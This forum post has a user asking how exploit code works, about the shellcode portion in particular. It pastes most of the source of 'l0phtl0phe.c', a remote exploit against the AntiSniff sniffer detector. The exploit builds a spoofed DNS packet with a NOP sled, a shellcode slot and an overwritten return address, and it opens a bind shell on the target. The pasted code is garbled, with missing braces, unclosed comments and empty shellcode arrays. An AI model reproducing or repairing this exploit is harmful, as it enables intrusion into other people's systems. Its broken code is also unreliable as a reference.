hi all,

i was wondering how exploits work, and i don't mean, you find an vulnerability and exploit it, but more in the line of coding.

source of a random selected exploit:
/* l0phtl0phe.c - antisniff exploit (1-1-1 "second fixed version" included)
 * -scut/teso
 * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
 * description:
 * l0pht messed up the fix for their problem in antisniff by not regarding
 * the type signedness properties of the char and int values used. this
 * results in a cool method bypassing the too extra checks (length + strncat).
 * some work on this topic have been done by mixter, (bad results on type
 * casting), but it should be obvious to any security conscious programmers.
 * i'm not stating that they aren't allowed errors, but they should fix it
 * for sure if they're going to fix it at all.  -sc.
 * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
 * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>

#define	OFFSET		0xbffef9a0

unsigned int	build_xp (unsigned char *xp);

main (int argc, char *argv[])
	int		sock;		/* raw socket */
	u_long		src_ip,

	unsigned char	xpbuf[1024];	/* this one gets complicated now */
	unsigned char	tpack[2048];	/* paket buffer */
	unsigned int	pl_len;

	if (argc != 3) {
		printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);

		exit (EXIT_FAILURE);

	sock = libnet_open_raw_sock (IPPROTO_RAW);
	if (sock == -1) {
		perror ("libnet_open_raw_sock");
		exit (EXIT_FAILURE);

	src_ip  = libnet_name_resolve (argv[1], 0);
	dst_ip  = libnet_name_resolve (argv[2], 0);

	pl_len = build_xp (xpbuf);

	libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
		src_ip, dst_ip, NULL, 0, tpack);
	libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
		tpack + IP_H);
	libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
		xpbuf, pl_len, tpack + IP_H + UDP_H);
	libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);

	/* they use "udp and dst port 53" as bpf, so we should have no problem
	libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
	libnet_close_raw_sock (sock);

	printf ("exploitation succeeded.\n");
	printf ("try: \"telnet %s 17664\" now.\n", argv[2]);


/* build_xp
 * build exploit buffer into buffer pointed to by `xp'.

unsigned int
build_xp (unsigned char *xp)
	int		i;
	unsigned char	buf[1024];
	unsigned char	shellcode[] =
		/* portshell 17644 portshellcode by smiler & scut */

	unsigned char	head[] =

	memcpy (buf, head, 9);
	for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
		buf[i] = '\x90';
	memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
		strlen (shellcode));

	buf[272] = '\xeb';
	buf[273] = '\x08';
	buf[274] = (OFFSET      ) & 0xff;
	buf[275] = (OFFSET >>  8) & 0xff;
	buf[276] = (OFFSET >> 16) & 0xff;
	buf[277] = (OFFSET >> 24) & 0xff;

	memcpy (xp, buf, sizeof (buf));

	return (sizeof (buf));;
now this is written in C, and most of the stuff i understand, but
parts like
/* portshell 17644 portshellcode by smiler & scut */
are completely unknown to me, is it code in hex, and if so, is it assembly, binary code, or C in hex, (although i doubt it will be the last).

and if so, how can you learn what the above peace of code means?

i put this is the programming section, since it has to do with coding...

thanks in advance for replying